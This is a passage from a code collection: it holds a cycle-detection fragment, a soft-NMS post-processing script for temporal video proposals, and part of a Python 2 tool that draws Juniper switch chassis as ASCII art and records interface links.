        Floyd's tortoise-and-hare: if fast (2x) and slow (1x) pointers meet,
        a cycle exists; a pointer restarted from the head and one from the
        meeting point then advance in lockstep and meet at the cycle entrance.
        """
        # Phase 1: look for a meeting point inside the cycle (if any).
        slow = fast = head
        meeting = None
        while fast and fast.next:
            slow = slow.next
            fast = fast.next.next
            if slow == fast:
                meeting = slow
                break
        # No meeting point => no cycle (also covers an empty list).
        if meeting is None:
            return None
        # Phase 2: advance from the head and from the meeting point at the
        # same speed; they coincide exactly at the cycle entrance.
        seeker = head
        while seeker != meeting:
            seeker = seeker.next
            meeting = meeting.next
        return seeker
|
991,671 | 7133aabfd2787ec66aa09f4500f8677f1595752d | import argparse
import json
import multiprocessing as mp
import os
import threading
import numpy as np
import pandas as pd
import tqdm
from utils.utils import getDatasetDict
from utils.read_config import Config
config = Config()
""" Define parser """
parser = argparse.ArgumentParser()
parser.add_argument('top_number', type=int, nargs='?', default=100)
parser.add_argument('-t', '--thread', type=int, nargs='?', default=16)
args = parser.parse_args()
""" Number of proposal needed to keep for every video"""
top_number = args.top_number
""" Number of thread for post processing"""
thread_num = args.thread
def IOU(s1, e1, s2, e2):
    """
    Temporal IoU of two 1-D segments [s1, e1] and [s2, e2].

    :return: intersection length / union length, or 0 when disjoint
    """
    if (s2 > e1) or (s1 > e2):
        return 0
    union_len = max(e1, e2) - min(s1, s2)
    inter_len = min(e1, e2) - max(s1, s2)
    return float(inter_len) / union_len
def softNMS(df):
    """
    soft-NMS for all proposals
    Greedily keeps the highest-scoring proposal, then decays the scores of
    overlapping proposals (Gaussian decay, sigma^2 = 0.95) instead of
    removing them. Relies on the module-level global `top_number` for the
    maximum number of proposals to keep.
    :param df: input dataframe with columns xmin, xmax, score
    :return: dataframe after soft-NMS (columns score, xmin, xmax)
    """
    tstart = list(df.xmin.values[:])
    tend = list(df.xmax.values[:])
    tscore = list(df.score.values[:])
    rstart = []
    rend = []
    rscore = []
    # NOTE(review): the loop stops when a single candidate remains, so the
    # last surviving proposal is never emitted -- possible off-by-one;
    # confirm whether `len(tscore) > 0` was intended.
    while len(tscore) > 1 and len(rscore) < top_number:
        max_index = tscore.index(max(tscore))
        tmp_start = tstart[max_index]
        tmp_end = tend[max_index]
        tmp_score = tscore[max_index]
        rstart.append(tmp_start)
        rend.append(tmp_end)
        rscore.append(tmp_score)
        tstart.pop(max_index)
        tend.pop(max_index)
        tscore.pop(max_index)
        tstart = np.array(tstart)
        tend = np.array(tend)
        tscore = np.array(tscore)
        # Vectorized IoU of the kept proposal against all remaining ones.
        tt1 = np.maximum(tmp_start, tstart)
        tt2 = np.minimum(tmp_end, tend)
        intersection = tt2 - tt1
        duration = tend - tstart
        tmp_width = tmp_end - tmp_start
        iou = intersection / (tmp_width + duration - intersection).astype(np.float)
        # Non-standard, width-dependent overlap threshold -- presumably tuned
        # for this dataset; TODO confirm against the training setup.
        idxs = np.where(iou > 0.5 + 0.25 * tmp_width)[0]
        # Gaussian score decay for sufficiently-overlapping proposals.
        tscore[idxs] = tscore[idxs] * np.exp(-np.square(iou[idxs]) / 0.95)
        tstart = list(tstart)
        tend = list(tend)
        tscore = list(tscore)
    newDf = pd.DataFrame()
    newDf['score'] = rscore
    newDf['xmin'] = rstart
    newDf['xmax'] = rend
    return newDf
def sub_processor(lock, pid, video_list):
    """
    Define job for every subprocess
    Reads each video's proposal CSV, scores and soft-NMS-filters the
    proposals, and writes the top results into the shared `result_dict`.
    Relies on module-level globals: config, top_number, video_dict,
    result_dict (a multiprocessing Manager dict).
    :param lock: threading lock
    :param pid: sub processor id
    :param video_list: video list assigned to each subprocess
    :return: None
    """
    text = 'processor %d' % pid
    with lock:
        # Lock serializes tqdm bar creation so per-process bars don't clash.
        progress = tqdm.tqdm(
            total=len(video_list),
            position=pid,
            desc=text
        )
    for i in range(len(video_list)):
        video_name = video_list[i]
        """ Read result csv file """
        df = pd.read_csv(os.path.join(config.post_csv_load_dir, video_name + ".csv"))
        """ Calculate final score of proposals """
        # Final score = IoU confidence * start probability * end probability.
        df['score'] = df.iou.values[:] * df.start.values[:] * df.end.values[:]
        if len(df) > 1:
            df = softNMS(df)
        df = df.sort_values(by="score", ascending=False)
        video_info = video_dict[video_name]
        video_duration = video_info["duration_second"]
        proposal_list = []
        # Convert normalized [0, 1] offsets to seconds, clamped to the video.
        for j in range(min(top_number, len(df))):
            tmp_proposal = {}
            tmp_proposal["score"] = df.score.values[j]
            tmp_proposal["segment"] = [max(0, df.xmin.values[j]) * video_duration,
                                       min(1, df.xmax.values[j]) * video_duration]
            # Hard-coded class label (Chinese for "walking") -- single-class setup.
            tmp_proposal["label"] = "行走"
            # tmp_proposal["label"] = "Fun sliding down"
            proposal_list.append(tmp_proposal)
        result_dict[video_name] = proposal_list
        with lock:
            progress.update(1)
    with lock:
        progress.close()
if __name__ == '__main__':
    print("starting post processing")
    train_dict, val_dict, test_dict = getDatasetDict(config, config.video_info_file)
    print(len(test_dict.keys()))
    # Pick the split to post-process based on config.mode.
    if config.mode == 'validation':
        video_dict = val_dict
    else:
        video_dict = test_dict
    output_file = config.post_json_save_path
    print('save to :{}'.format(output_file))
    video_list = list(video_dict.keys())
    """ Post processing using multiprocessing
    """
    # NOTE(review): `global` at module level is a no-op; workers read the
    # module globals set above, which works under fork-based start methods --
    # confirm behavior on platforms that default to spawn (e.g. Windows).
    global result_dict
    result_dict = mp.Manager().dict()
    processes = []
    lock = threading.Lock()
    # Split videos as evenly as possible; the last worker takes the remainder.
    total_video_num = len(video_list)
    per_thread_video_num = total_video_num // thread_num
    for i in range(thread_num):
        if i == thread_num - 1:
            sub_video_list = video_list[i * per_thread_video_num:]
        else:
            sub_video_list = video_list[i * per_thread_video_num: (i + 1) * per_thread_video_num]
        p = mp.Process(target=sub_processor, args=(lock, i, sub_video_list))
        p.start()
        processes.append(p)
    for p in processes:
        p.join()
    """ Save result json file """
    result_dict = dict(result_dict)
    with open(output_file, 'w') as outfile:
        json.dump(result_dict, outfile)
    print("result json file saved in ", output_file)
|
991,672 | 0963e755c4cd75915a988af41db7152cd7d93447 | # File: jtemp.py
# Author: Tyler Jordan
# Modified: 8/28/2015
# Purpose: Assist CBP engineers with Juniper configuration tasks
import sys,fileinput,code,re,csv
import utility
import math
import pprint
import re
from utility import *
from storage import *
from jnpr.junos import Device
from jnpr.junos.utils.config import Config
from lxml import etree
from getpass import getpass
# Global Variables (module-level state shared by the display helpers below)
csv_path = '.\\csv\\'            # Windows-style relative path to CSV inputs
template_path = '.\\template\\'  # Windows-style relative path to templates
pp = pprint.PrettyPrinter(indent=2)
wan_router = {}  # device inventory keyed by hostname; populated elsewhere
lan_router = {}  # device inventory keyed by hostname; populated elsewhere
link_map = {}
# Display single chassis systems and their components. Side can be "Front", "Rear", or "Both".
# NOTE(review): Python 2 only (`print` statements, `dict.has_key`). Relies on
# the module-level `lan_router` inventory and on the chassisStackView /
# chassisModularView helpers defined elsewhere in this file.
def displayChassisHardware(hostname, viewside='Both'):
    if lan_router.has_key(hostname):
        # Get the hostname chassis type, determine if single or VC
        chassis_mod = lan_router[hostname]['chassis_mod']
        # Display Hostname
        print "Hostname: " + hostname
        # Virtual Chassis Views: one stack view per FPC (member switch).
        # NOTE(review): `chassis_mod` is reassigned inside the loops to each
        # member's fpc_mod, discarding the 'Virtual_Chassis' value -- appears
        # intentional, but confirm.
        if chassis_mod == 'Virtual_Chassis':
            if viewside == 'Front' or viewside == 'Both':
                print "Side: Front"
                for fpc in lan_router[hostname]['interfaces']['physical'].keys():
                    chassis_mod = lan_router[hostname]['interfaces']['physical'][fpc]['fpc_mod']
                    chassisStackView(hostname, fpc, chassis_mod, 'Front')
            if viewside == 'Rear' or viewside == 'Both':
                print "Side: Rear"
                for fpc in lan_router[hostname]['interfaces']['physical'].keys():
                    chassis_mod = lan_router[hostname]['interfaces']['physical'][fpc]['fpc_mod']
                    chassisStackView(hostname, fpc, chassis_mod, 'Rear')
        # Modular Chassis Views (EX6210 only has a front view)
        elif chassis_mod == 'EX6210':
            chassis_side = "Front"
            print "Side: Front"
            chassisModularView(hostname, chassis_mod, chassis_side)
        # Stackable Chassis Views (single fixed-configuration unit, FPC 0)
        else:
            fpc = 0
            if viewside == 'Front' or viewside == 'Both':
                print "Side: Front"
                chassisStackView(hostname, fpc, chassis_mod, "Front")
            if viewside == 'Rear' or viewside == 'Both':
                print "Side: Rear"
                chassisStackView(hostname, fpc, chassis_mod, "Rear")
    else:
        # Unknown hostname: print a placeholder instead of a chassis view.
        print "Hostname: " + hostname
        print "--- No Image Available ---"
# Assemble and print the contents of device(s)
def assembleViewPrint(chassisWidth, hostname, fpc, myList, onPorts, onLabels, onBorders):
pic = 0
if onPorts:
#'ports', 's1', 'vb1', 's1' 'pic2', 's1', 'vb1', 's1', 'e', '0'
#print myList
for loopNum in range(1, 5):
theLine = '|'
myport = 0 # new addition
for prtcmd in myList:
if loopNum == 1:
# Matches a port
if re.match(r'^\d{1,3}$', prtcmd) or re.match(r'^\d{1}p\d{1,3}$', prtcmd):
theLine += "-----+"
# A series of ports starting
elif prtcmd == 'e':
theLine += "+"
# A space or spaces
elif re.match(r'^s\d{1,3}$', prtcmd):
#myspace = re.match(r'^s\d{1,3}$', prtcmd).group(0)
numlist = prtcmd.split('s')
theLine += " "*int(numlist[1])
# A vertial border or borders
elif re.match(r'^vb\d{1,3}$', prtcmd):
numlist = prtcmd.split('b')
theLine += "|"*int(numlist[1])
elif loopNum == 2:
# Matches native chassis ports
if re.match(r'^\d{1,3}$', prtcmd):
myport = int(prtcmd)
#print "FPC: " + str(fpc) + " PIC: " + str(pic) + " PORT: " + str(myport)
# NEED TO REVERSE PRINTING EVENTUALLY
if lan_router[hostname]['interfaces']['physical'][fpc][pic].has_key(myport):
if lan_router[hostname]['interfaces']['physical'][fpc][pic][myport]['is_linked']:
theLine += "X "
else:
theLine += " "
else:
print "ERROR - NO MATCH - NATIVE!"
#pp.pprint(lan_router[hostname])
# Determine if port is 1 digit or 2 digits so ports print correctly
if myport > 9:
theLine += str(myport) + " |"
else:
theLine += str(myport) + " |"
# Match expansion module ports
elif re.match(r'^\d{1}p\d{1,3}$', prtcmd):
numlist = prtcmd.split('p')
modpic = int(numlist[0])
myport = int(numlist[1])
#print "FPC: " + str(fpc) + " PIC: " + str(pic) + " PORT: " + str(myport)
# NEED TO REVERSE PRINTING EVENTUALLY
if lan_router[hostname]['interfaces']['physical'][fpc][modpic].has_key(myport):
if lan_router[hostname]['interfaces']['physical'][fpc][modpic][myport]['is_linked']:
theLine += "X "
else:
theLine += " "
else:
print "ERROR - NO MATCH - EXPAN!"
# Determine if port is 1 digit or 2 digits so ports print correctly
if myport > 9:
theLine += str(myport) + " |"
else:
theLine += str(myport) + " |"
# A series of ports starting
elif prtcmd == 'e':
theLine += "|"
# A space or spaces
elif re.match(r'^s\d{1,3}$', prtcmd):
numlist = prtcmd.split('s')
theLine += " "*int(numlist[1])
# A vertial border or borders
elif re.match(r'^vb\d{1,3}$', prtcmd):
numlist = prtcmd.split('b')
theLine += "|"*int(numlist[1])
# Prevent this term from being printed
elif re.match(r'bpic\d{1}$', prtcmd):
# Do nothing
pass
# This should only be hit with the hostnamename
elif prtcmd != 'end':
theLine += prtcmd
elif loopNum == 3:
# Matches native chassis ports
#print "PRTCMD: " + prtcmd
if re.match(r'^\d{1,3}$', prtcmd):
myport = int(prtcmd)
#print "FPC: " + str(fpc) + " PIC: " + str(pic) + " PORT: " + str(myport)
# NEED TO REVERSE PRINTING EVENTUALLY
if myport in lan_router[hostname]['interfaces']['physical'][fpc][pic]:
if "access_mode" in lan_router[hostname]['interfaces']['physical'][fpc][pic][myport]:
access_mode = lan_router[hostname]['interfaces']['physical'][fpc][pic][myport]['access_mode']
theLine += access_mode + " "*(5 - (len(access_mode))) + "|"
else:
theLine += " |"
else:
print "ERROR - NO MATCH - NATIVE!"
#pp.pprint(lan_router[hostname])
# Match expansion module ports
elif re.match(r'^\d{1}p\d{1,3}$', prtcmd):
numlist = prtcmd.split('p')
modpic = int(numlist[0])
myport = int(numlist[1])
#lan_router[hostname]['interfaces']['physical'][fpc][pic][myport]['access_mode'] = "VCP"
#print "FPC: " + str(fpc) + " PIC: " + str(pic) + " PORT: " + str(myport)
#print "Access Mode: " + lan_router[hostname]['interfaces']['physical'][fpc][pic][myport]['access_mode']
#pp.pprint(lan_router[hostname]['interfaces']['physical'][fpc][modpic][myport])
# NEED TO REVERSE PRINTING EVENTUALLY
if myport in lan_router[hostname]['interfaces']['physical'][fpc][modpic]:
#print "First IF..."
if "access_mode" in lan_router[hostname]['interfaces']['physical'][fpc][modpic][myport]:
#print "Second IF..."
access_mode = lan_router[hostname]['interfaces']['physical'][fpc][modpic][myport]['access_mode']
theLine += access_mode + " "*(5 - (len(access_mode))) + "|"
else:
theLine += " |"
else:
print "ERROR - NO MATCH - EXPAN!"
#pp.pprint(lan_router[hostname]['interfaces']['physical'][fpc][modpic][myport])
# A port
#if re.match(r'^\d{1,3}$', prtcmd) or re.match(r'^\d{1}p\d{1,3}$', prtcmd):
# theLine += " |"
# A series of ports starting
elif prtcmd == 'e':
theLine += "|"
# A space or spaces
elif re.match(r'^s\d{1,3}$', prtcmd):
numlist = prtcmd.split('s')
theLine += " "*int(numlist[1])
# A vertial border or borders
elif re.match(r'^vb\d{1,3}$', prtcmd):
numlist = prtcmd.split('b')
theLine += "|"*int(numlist[1])
if loopNum == 4:
# A port
if re.match(r'^\d{1,3}$', prtcmd) or re.match(r'^\d{1}p\d{1,3}$', prtcmd):
theLine += "-----+"
# A series of ports starting
elif prtcmd == 'e':
theLine += "+"
# A space or spaces
elif re.match(r'^s\d{1,3}$', prtcmd):
#myspace = re.match(r'^s\d{1,3}$', prtcmd).group(0)
numlist = prtcmd.split('s')
theLine += " "*int(numlist[1])
# A vertial border or borders
elif re.match(r'^vb\d{1,3}$', prtcmd):
numlist = prtcmd.split('b')
theLine += "|"*int(numlist[1])
# A PIC border
elif re.match(r'bpic\d{1}$', prtcmd):
numlist = prtcmd.split('c')
theLine += "+-----------PIC" + " " + numlist[1] + "-----------+"
if prtcmd == 'end':
rem = chassisWidth - len(theLine)
theLine += " "*(rem - 1) + "|"
# Display the whole line on the screen
print theLine
#'labels', 's1', 'pic2', 'sX', '32x 1G SFP', 'sX', 'auxpic0', 'end'
elif onLabels:
#print "On Labels"
#print myList
theLine = '|'
for prtcmd in myList:
# A space or spaces
if re.match(r'^s\d{1,3}$', prtcmd):
numlist = prtcmd.split('s')
theLine += " "*int(numlist[1])
# A vertial border or borders
elif re.match(r'^vb\d{1,3}$', prtcmd):
numlist = prtcmd.split('b')
theLine += "|"*int(numlist[1])
# Dynamic spacing function so SLOT looks right
elif re.match(r'^dyns\d{1,3}$', prtcmd):
numlist = prtcmd.split('s')
rem = int(numlist[1]) - len(theLine)
theLine += " "*rem
elif prtcmd == 'end':
rem = chassisWidth - len(theLine)
theLine += " "*(rem - 1) + "|"
else:
theLine += prtcmd
# Display the whole line on the screen
print theLine
# 'border', 's1', 'cb1', 'hb29', 'cb1', 'end'
elif onBorders:
#print "On Borders"
#print myList
theLine = '|'
for prtcmd in myList:
# A corner border or borders
if re.match(r'^cb\d{1,3}$', prtcmd):
numlist = prtcmd.split('b')
theLine += "+"*int(numlist[1])
# A horizontal border or borders
elif re.match(r'^hb\d{1,3}$', prtcmd):
numlist = prtcmd.split('b')
theLine += "-"*int(numlist[1])
# A space or spaces
elif re.match(r'^s\d{1,3}$', prtcmd):
numlist = prtcmd.split('s')
theLine += " "*int(numlist[1])
# A vertial border or borders
elif re.match(r'^vb\d{1,3}$', prtcmd):
numlist = prtcmd.split('b')
theLine += "|"*int(numlist[1])
# Add FPC info to print out
elif re.match(r'^fpc$', prtcmd):
theLine += "FPC " + str(fpc)
# Catch anything else (text)
elif prtcmd != 'end':
theLine += prtcmd
# Display the whole int on the screen
if prtcmd == 'end':
rem = chassisWidth - len(theLine)
theLine += " "*(rem - 1) + "|"
# Display the whole line on the screen
print theLine
else:
print "Unknown Line"
# Creates and displays the images
def chassisModularView(hostname, chassis_mod, chassis_side):
    """Render an ASCII-art front/back view of a modular chassis.

    hostname     -- key into the global lan_router dictionary
    chassis_mod  -- chassis model name, key into visual_chassis
    chassis_side -- side of the chassis to draw (key under the model)

    Walks the visual_chassis drawing template slot by slot and tier by
    tier, expands each 'slot' token into the drawing commands of the
    module installed in that FPC (or a blank filler panel), and hands
    each assembled tier to assembleViewPrint() for display.
    """
    print "Router Model: " + chassis_mod
    #pp.pprint(lan_router[hostname])
    # Fixed drawing width for modular chassis: 160 dashes + 2 corners
    chassisWidth = 162
    chassisTop = "+" + "-"*160 + "+"
    # Create top of chassis
    print chassisTop
    # Start looping through chassis mappings
    for slot in sorted(visual_chassis[chassis_mod][chassis_side].keys()):
        # Determine FPC number from the slot label (e.g. "S3" -> 3)
        fpc = int(slot.split('S')[1])
        for tier in sorted(visual_chassis[chassis_mod][chassis_side][slot].keys()):
            myList = []
            theLine = ""
            # Rendering-mode flags consumed by assembleViewPrint()
            onPorts = False
            onLabels = False
            onBorders = False
            # Loop through each tier
            for prtcmd in visual_chassis[chassis_mod][chassis_side][slot][tier]:
                # The leading token of a tier selects the rendering mode
                if prtcmd == 'ports':
                    onPorts = True
                elif prtcmd == 'labels':
                    onLabels = True
                elif prtcmd == 'border':
                    onBorders = True
                # Keep checking for slots
                elif prtcmd == 'slot':
                    # If a module is in this slot...
                    #print "Matched slot!"
                    #print "FPC = " + str(fpc)
                    if lan_router[hostname]['interfaces']['physical'].has_key(fpc):
                        #print "Inside Loop"
                        fpc_mod = lan_router[hostname]['interfaces']['physical'][fpc]['fpc_mod']
                        #print "FPC: " + fpc_mod
                        for fpccmd in visual_modules[fpc_mod][tier]:
                            myList.append(fpccmd)
                    # If a module is not in this slot...
                    else:
                        # Could use the empty slot module...
                        #print "BLANK SLOT"
                        # Empty slots are drawn with the blank filler panel
                        fpc_mod = "EX6200-BLANK"
                        for fpccmd in visual_modules[fpc_mod][tier]:
                            myList.append(fpccmd)
                # Add Slot Number to Chassis
                elif prtcmd == 'slot_num':
                    myList.append("SLOT " + str(fpc))
                else:
                    # Literal drawing command, pass through unchanged
                    myList.append(prtcmd)
            # Assembles and prints out content of device(s)
            assembleViewPrint(chassisWidth, hostname, fpc, myList, onPorts, onLabels, onBorders)
    # Print bottom border of chassis
    print chassisTop
# Creates and displays the images
def chassisStackView(hostname, fpc, chassis_mod, chassis_side):
    """Render an ASCII-art view of one member (FPC) of a stacked chassis.

    hostname     -- key into the global lan_router dictionary
    fpc          -- the virtual-chassis member / FPC number to draw
    chassis_mod  -- chassis model name, key into visual_chassis
    chassis_side -- side of the chassis to draw (key under the model)

    Expands 'picN' / 'auxpicN' tokens from the drawing template into the
    drawing commands of the installed module (port numbers are rewritten
    to "<pic>p<port>" so assembleViewPrint can locate them), then prints
    each tier via assembleViewPrint().
    """
    # Stacked chassis are drawn wider than modular ones: 178 dashes + corners
    chassisWidth = 180
    chassisTop = "+" + "-"*178 + "+"
    # Create top of chassis
    print chassisTop
    # Start looping through chassis mappings
    for tier in sorted(visual_chassis[chassis_mod][chassis_side].keys()):
        myList = []
        # NOTE(review): loopNum is never used in this function
        loopNum = 0
        theLine = ""
        onPorts = False
        onLabels = False
        onBorders = False
        # Loop through each tier
        for prtcmd in visual_chassis[chassis_mod][chassis_side][tier]:
            if prtcmd == 'ports':
                onPorts = True
            elif prtcmd == 'labels':
                onLabels = True
            elif prtcmd == 'border':
                onBorders = True
            # Keep checking for PICs
            elif re.match(r'^pic\d{1}$', prtcmd):
                # Extract the PIC number and convert to an integer
                pic = int(prtcmd.split('c')[1])
                # If a module is in this slot...
                if lan_router[hostname]['interfaces']['physical'][fpc].has_key(pic):
                    #print "PIC Exists"
                    pic_mod = lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod']
                    #pic_mod += " (" + str(pic) + ")"
                    #print "PIC Module: " + pic_mod
                    for piccmd in visual_modules[pic_mod][tier]:
                        # Bare port numbers are tagged with their PIC ("2p15")
                        if re.match(r'^\d{1,3}$', piccmd):
                            piccmd = str(pic) + 'p' + piccmd
                            myList.append(piccmd)
                        else:
                            myList.append(piccmd)
                # If a module is not in this slot...
                else:
                    # Could use the empty slot module...
                    pic_mod = "EX4300-BLANK"
                    for piccmd in visual_modules[pic_mod][tier]:
                        myList.append(piccmd)
                    #print "PIC Slot Empty"
                # for piccmd in visual_modules[module_mod]
            elif re.match(r'^auxpic\d{1}$', prtcmd):
                # Auxiliary (uplink) module attached to an existing PIC
                pic = int(prtcmd.split('c')[1])
                if lan_router[hostname]['interfaces']['physical'][fpc][pic]['has_aux']:
                    #print "Aux PIC Exists"
                    pic_mod = lan_router[hostname]['interfaces']['physical'][fpc][pic]['aux_mod']
                    #pic_mod += " (" + str(pic) + ")"
                    #print "PIC Module: " + pic_mod
                    for piccmd in visual_modules[pic_mod][tier]:
                        if re.match(r'^\d{1,3}$', piccmd):
                            piccmd = str(pic) + 'p' + piccmd
                            myList.append(piccmd)
                        else:
                            myList.append(piccmd)
                else:
                    print "Error: PIC not in router"
            else:
                # Literal drawing command, pass through unchanged
                myList.append(prtcmd)
        # Assembles and prints out content of device(s)
        assembleViewPrint(chassisWidth, hostname, fpc, myList, onPorts, onLabels, onBorders)
    # Print bottom border of chassis
    print chassisTop
# Adds the interfaces that are common to this chassis, includes native and built-in interfaces
def addNativeInterfaces(hostname, chassis_mod, is_vc, fpc, pic):
    """Register the chassis-native (built-in) ports of one FPC/PIC.

    Builds the fpc/pic branch of lan_router[hostname]['interfaces']
    ['physical'], assigns default virtual-chassis priorities when is_vc
    is set, and creates one unlinked port record per native port of the
    chassis model (port count comes from system_model).
    """
    phys = lan_router[hostname]['interfaces']['physical']
    # Number of native ports this chassis model carries
    port_count = system_model[chassis_mod]['port_num']
    # Build out base of interface hierarchy
    phys[fpc] = {}
    phys[fpc]['fpc_mod'] = chassis_mod
    # Default VC priorities: members 0/1 are routing-engine candidates
    # (255); members 2..9 descend from 10 down to 3 (i.e. 12 - fpc).
    if is_vc:
        if fpc in (0, 1):
            phys[fpc]['vc_priority'] = 255
        elif 2 <= fpc <= 9:
            phys[fpc]['vc_priority'] = 12 - fpc
    # Describe the native PIC itself
    phys[fpc][pic] = {
        'module_type' : 'native',
        'module_mod'  : chassis_mod,
        'has_aux'     : False,
    }
    # One record per port, all initially unlinked and unbundled
    for port in range(port_count):
        phys[fpc][pic][port] = {
            'port'       : port,
            'is_linked'  : False,
            'is_bundled' : False,
        }
    print("Successfully added NATIVE interfaces...\n")
# Set system hostname
def setSystemHostname(oldhost=""):
newhost = ""
if oldhost:
# For changing hostname after initial config
print "The current hostname is: " + oldhost
newhost = getInputAnswer("Enter hostname")
while not isUniqueHostname(newhost):
newhost = getInputAnswer("Enter hostname")
lan_router[newhost] = lan_router[oldhost]
del lan_router[oldhost]
else:
# For during initial configuration
newhost = getInputAnswer("Enter hostname")
while not isUniqueHostname(newhost):
newhost = getInputAnswer("Enter hostname")
lan_router.update({ newhost : {} })
return newhost
# Create basic system configuration
def setSystemCommon():
    """Ask for the system type (MDF or IDF) and hostname of a new device.

    Returns the new hostname, or None when the user chooses "Go Back".
    """
    hostname = None
    choice = getOptionTRAnswer("Select system type",
                               [ "MDF", "IDF", "Go Back" ])
    # Index 0 -> mdf, index 1 -> idf; anything else means "Go Back"
    if choice in (0, 1):
        system_type = "mdf" if choice == 0 else "idf"
        # Set Hostname
        hostname = setSystemHostname()
        # Record the system type on the new device entry
        lan_router[hostname]['system_type'] = system_type
    return hostname
# Create actual module interfaces
def addModuleInterfaces(hostname, fpc, pic, mod):
    """Create the port records for an expansion or built-in module.

    The EX4300-UM-4XSFP uplink module is special-cased: its four ports
    are appended to the (possibly pre-existing) PIC as ports 32-35 and
    flagged is_aux.  Every other module gets its own fresh PIC entry
    with ports 0..port_num-1.
    """
    fpc_branch = lan_router[hostname]['interfaces']['physical'][fpc]
    # Port count and builtin-vs-expansion flag come from the module catalogue
    port_total = modular_model[mod]['port_num']
    kind = 'builtin' if modular_model[mod]['built_in'] else 'expan'
    if mod == 'EX4300-UM-4XSFP':
        # Auxiliary uplink module: piggy-backs on the existing PIC
        if pic not in fpc_branch:
            fpc_branch[pic] = {}
        fpc_branch[pic]['aux_type'] = kind
        fpc_branch[pic]['has_aux'] = True
        fpc_branch[pic]['aux_mod'] = mod
        # Its interfaces are appended at the end of the PIC: ports 32-35
        port_range = range(32, 36)
        extra = { 'is_aux' : True }
    else:
        # Regular module: fresh PIC entry
        fpc_branch[pic] = {}
        fpc_branch[pic]['module_type'] = kind
        fpc_branch[pic]['has_aux'] = False
        fpc_branch[pic]['module_mod'] = mod
        port_range = range(0, port_total)
        extra = {}
    # One record per port, initially unlinked/unbundled
    for port in port_range:
        record = { 'port' : port, 'is_linked' : False,
                   'is_bundled' : False, 'access_mode' : ' ' }
        record.update(extra)
        fpc_branch[pic][port] = record
    print("Successfully added " + mod + " to slot " + str(pic) + " ...\n")
# Check if slot is used
def slotUsed(hostname, fpc, pic):
if lan_router[hostname]['interfaces']['physical'][fpc].has_key(pic):
print "Slot is USED"
return True
else:
print "Slot is NOT USED"
return False
###############################
# ========== LINKS ========== #
###############################
# Check user input and see if link is valid/unused
def parseInterface(intf):
    """Parse an "fpc/pic/port" interface string.

    Returns a dict with integer 'fpc', 'pic' and 'port' keys, or an
    empty dict when the string is not in the expected form.  (Callers
    index the result directly, so an invalid string surfaces as a
    KeyError upstream.)

    Each field was widened from \\d{1,2} to \\d{1,3} so three-digit
    numbers are accepted, matching the \\d{1,3} port patterns used by
    the chassis-drawing code elsewhere in this file.
    """
    match = re.match(r'^(\d{1,3})\/(\d{1,3})\/(\d{1,3})$', intf)
    if match:
        return {
            'fpc'  : int(match.group(1)),
            'pic'  : int(match.group(2)),
            'port' : int(match.group(3)),
        }
    return {}
# Check if an interface exists
def isInterfaceExists(intf, hostname):
portLoc = parseInterface(intf)
if lan_router[hostname]['interfaces']['physical'].has_key(portLoc['fpc']):
if lan_router[hostname]['interfaces']['physical'][portLoc['fpc']].has_key(portLoc['pic']):
if lan_router[hostname]['interfaces']['physical'][portLoc['fpc']][portLoc['pic']].has_key(portLoc['port']):
if lan_router[hostname]['interfaces']['physical'][portLoc['fpc']][portLoc['pic']].has_key('module_mod'):
#print "Mod of PIC is: " + lan_router[hostname]['interfaces']['physical'][portLoc['fpc']][portLoc['pic']]['module_mod']
pass
elif lan_router[hostname]['interfaces']['physical'][portLoc['fpc']].has_key('fpc_mod'):
#print "Mod of FPC is: " + lan_router[hostname]['interfaces']['physical'][portLoc['fpc']]['fpc_mod']
pass
return True
else:
print "PORT was invalid"
return False
else:
print "PIC was invalid"
return False
else:
print "FPC was invalid"
return False
# Check if an interface is assigned to a link (true) or not (false)
def isInterfaceAvailable(intf, hostname):
    """Return True when the interface exists and is not already linked."""
    if not isInterfaceExists(intf, hostname):
        return False
    loc = parseInterface(intf)
    port = lan_router[hostname]['interfaces']['physical'][loc['fpc']][loc['pic']][loc['port']]
    return not port['is_linked']
# Get a parameter
def getParameter(hostname, iparams, parameter):
    """Stub: apparently intended to look up *parameter* for the interface
    addressed by iparams on *hostname*.

    NOTE(review): this function is unfinished -- both branches only
    `pass`, `results` and `parameter` are never used, and nothing is
    returned.  Complete or remove it.
    """
    results = []
    # Check if an "aux" pic exists
    if lan_router[hostname]['interfaces']['physical'][iparams[0]].has_key('aux'):
        # Check if this interface is the appropriate one
        if lan_router[hostname]['interfaces']['physical'][iparams[0]]['aux'].has_key(iparams[1]):
            pass
    if lan_router[hostname]['interfaces']['physical'][iparams[0]].has_key(iparams[1]):
        pass
# Create a P2P link
def createLink():
    """Interactively create a point-to-point link between two devices.

    Prompts the user for two hosts and an interface on each; collects
    the possible speeds/media of each end from the module catalogues,
    negotiates a common speed/media, and hands the validated pair to
    addLinks().  LAN hosts are validated against lan_router; WAN hosts
    simply pick one of their named interfaces.
    """
    hosts = selectDevices('both')
    intfsValid = False
    # links[1] / links[2] hold the two candidate link endpoints
    links = {}
    # NOTE(review): firstLoopValid is never used
    firstLoopValid = False
    linkNum = 0
    one = 1
    two = 2
    speedOptions = []
    # Loop on hosts
    for hostname in hosts:
        linkNum += one
        # Display chassis
        displayChassisHardware(hostname, "Both")
        # Display menu to ask for interface
        print "Checking host: " + hostname
        intfsValid = False
        # Check if this host is a lan host
        if hostname in lan_router:
            while not intfsValid:
                myIntf = getInputAnswer("Enter the " + hostname + " side interface to use")
                # If the interface exists
                if isInterfaceExists(myIntf, hostname):
                    intfsValid = True
                    # GET possible port properties and ADD to dictionary
                    props = parseInterface(myIntf)
                    # Candidate Interface Dictionary
                    links.update({ linkNum : {} })
                    links[linkNum].update({ 'Hostname' : hostname })
                    links[linkNum].update({ 'PosSpeed' : [] })
                    links[linkNum].update({ 'PosMedia' : [] })
                    links[linkNum].update({ 'FPC' : props['fpc'] })
                    links[linkNum].update({ 'PIC' : props['pic'] })
                    links[linkNum].update({ 'PORT' : props['port'] })
                    # Check if this interface is already linked...
                    if lan_router[hostname]['interfaces']['physical'][props['fpc']][props['pic']][props['port']]['is_linked']:
                        print "Interface " + str(props['fpc']) + '/' + str(props['pic']) + '/' + str(props['port']) + " already linked!"
                        intfsValid = False
                    # Checks if this port is in a expansion module, get model from PIC
                    # Check if this is an auxiliary port
                    elif lan_router[hostname]['interfaces']['physical'][props['fpc']][props['pic']].has_key('has_aux') and lan_router[hostname]['interfaces']['physical'][props['fpc']][props['pic']][props['port']].has_key('is_aux'):
                        model = lan_router[hostname]['interfaces']['physical'][props['fpc']][props['pic']]['aux_mod']
                        #print "Aux Port: " + model + " (PIC)"
